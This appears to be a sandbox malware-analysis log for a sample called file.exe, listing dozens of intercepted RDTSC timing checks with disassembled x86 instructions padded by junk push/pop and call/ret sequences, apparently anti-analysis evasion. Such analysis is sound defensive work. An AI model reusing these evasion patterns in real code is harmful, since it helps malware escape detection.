Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC8B6 second address: BAC8CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE4211E2AC0h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB656 second address: BDB670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FE420CEA014h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDBD46 second address: BDBD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDBD4C second address: BDBD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDBD50 second address: BDBD77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC8h 0x00000007 jp 00007FE4211E2AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDBF27 second address: BDBF2D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC0B4 second address: BDC0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FE4211E2AC9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE149E second address: BE14A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7E98 second address: BE7E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7E9D second address: BE7EC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE420CEA00Eh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE420CEA014h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE8039 second address: BE806D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE4211E2AC5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE806D second address: BE8071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE8071 second address: BE8095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007FE4211E2AC8h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE8095 second address: BE809E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE809E second address: BE80C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FE4211E2AB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAF6E second address: BEAF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAFF1 second address: BEB00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FE4211E2AC0h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB00C second address: BEB012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB012 second address: BEB046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jl 00007FE4211E2AD4h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB046 second address: BEB077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jbe 00007FE420CEA00Ch 0x0000000b jc 00007FE420CEA006h 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FE420CEA019h 0x0000001e jmp 00007FE420CEA013h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB78D second address: BEB791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB891 second address: BEB8A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA014h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB8A9 second address: BEB8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB8AF second address: BEB8B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBCC8 second address: BEBCCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBE4A second address: BEBE4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBE4E second address: BEBE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC003 second address: BEC007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC10E second address: BEC112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC27C second address: BEC285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECF4E second address: BECF74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jc 00007FE4211E2AC4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BECF74 second address: BECF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEECDD second address: BEECE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEED7F second address: BEED83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF96B second address: BEF970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF970 second address: BEF981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF981 second address: BEF993 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF993 second address: BEF997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF997 second address: BEF9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE4211E2AB8h 0x0000000c popad 0x0000000d nop 0x0000000e sub dword ptr [ebp+122D3299h], eax 0x00000014 push 00000000h 0x00000016 jmp 00007FE4211E2AC0h 0x0000001b push 00000000h 0x0000001d call 00007FE4211E2ABAh 0x00000022 or di, FD60h 0x00000027 pop edi 0x00000028 push eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF9D7 second address: BEF9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF9DB second address: BEF9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF690 second address: BEF696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF696 second address: BEF6A9 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4211E2AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF6A9 second address: BEF6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF6AD second address: BEF6B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF6B3 second address: BEF6B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0244 second address: BF024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF024A second address: BF024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0E7A second address: BF0EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FE4211E2AC1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0EAA second address: BF0EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0EB1 second address: BF0F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FE4211E2AB8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push ebx 0x00000023 pop esi 0x00000024 push 00000000h 0x00000026 sub esi, dword ptr [ebp+122D2A7Fh] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FE4211E2AB8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 or esi, dword ptr [ebp+122D35ADh] 0x0000004e mov esi, dword ptr [ebp+122D1A1Bh] 0x00000054 xchg eax, ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007FE4211E2AB8h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF0F1C second address: BF0F40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007FE420CEA006h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE420CEA015h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF199D second address: BF19AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2ABAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF19AB second address: BF19E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FE420CEA00Ch 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 movsx edi, di 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D3491h] 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 jnp 00007FE420CEA00Ch 0x00000026 jne 00007FE420CEA006h 0x0000002c push eax 0x0000002d push edx 0x0000002e jnc 00007FE420CEA006h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF19E6 second address: BF1A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF4E14 second address: BF4E19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6DBB second address: BF6E3C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE4211E2ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007FE4211E2AC8h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FE4211E2AB8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FE4211E2AB8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 stc 0x00000049 push 00000000h 0x0000004b call 00007FE4211E2AC0h 0x00000050 pop edi 0x00000051 xchg eax, esi 0x00000052 push ebx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6E3C second address: BF6E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6E4B second address: BF6E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6E4F second address: BF6E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6E55 second address: BF6E5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7E37 second address: BF7E4B instructions: 0x00000000 rdtsc 0x00000002 je 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7E4B second address: BF7E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7E51 second address: BF7E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7E55 second address: BF7EC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FE4211E2AB8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 sub bx, B17Dh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FE4211E2AB8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 pushad 0x00000045 mov dword ptr [ebp+1244F9B1h], esi 0x0000004b jnl 00007FE4211E2ABCh 0x00000051 popad 0x00000052 movzx edi, ax 0x00000055 push 00000000h 0x00000057 clc 0x00000058 xchg eax, esi 0x00000059 jc 00007FE4211E2AC4h 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5F55 second address: BF5F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF5F5B second address: BF5FE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FE4211E2AC3h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FE4211E2AB8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov bx, 389Fh 0x00000036 cld 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e jmp 00007FE4211E2ABFh 0x00000043 mov dword ptr [ebp+122D31FDh], ecx 0x00000049 mov eax, dword ptr [ebp+122D0F5Dh] 0x0000004f push FFFFFFFFh 0x00000051 mov bh, al 0x00000053 nop 0x00000054 pushad 0x00000055 pushad 0x00000056 jc 00007FE4211E2AB6h 0x0000005c pushad 0x0000005d popad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF6F62 second address: BF6F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FE420CEA00Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFADFC second address: BFAE86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FE4211E2AC4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FE4211E2AB8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a call 00007FE4211E2ABBh 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FE4211E2AB8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push edi 0x0000004d mov edi, dword ptr [ebp+1247782Fh] 0x00000053 pop ebx 0x00000054 mov di, 14E9h 0x00000058 push 00000000h 0x0000005a mov dword ptr [ebp+122D1AE6h], esi 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7012 second address: BF7018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFAE86 second address: BFAE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF7018 second address: BF7028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007FE420CEA00Eh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF9FF3 second address: BFA085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+1244F423h], edx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FE4211E2AB8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FE4211E2AB8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 sub bh, FFFFFFF7h 0x00000054 mov eax, dword ptr [ebp+122D05C5h] 0x0000005a mov edi, dword ptr [ebp+122D32E5h] 0x00000060 push FFFFFFFFh 0x00000062 mov edi, dword ptr [ebp+122D2F56h] 0x00000068 nop 0x00000069 push edi 0x0000006a jmp 00007FE4211E2ABBh 0x0000006f pop edi 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push ecx 0x00000074 jmp 00007FE4211E2ABEh 0x00000079 pop ecx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA085 second address: BFA08B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA08B second address: BFA08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA08F second address: BFA093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFCFFE second address: BFD005 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC08C second address: BFC097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE420CEA006h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC097 second address: BFC09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFC09D second address: BFC0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00118 second address: C0012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FE4211E2ABCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0012C second address: C00132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C00132 second address: C00136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C010D4 second address: C010D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
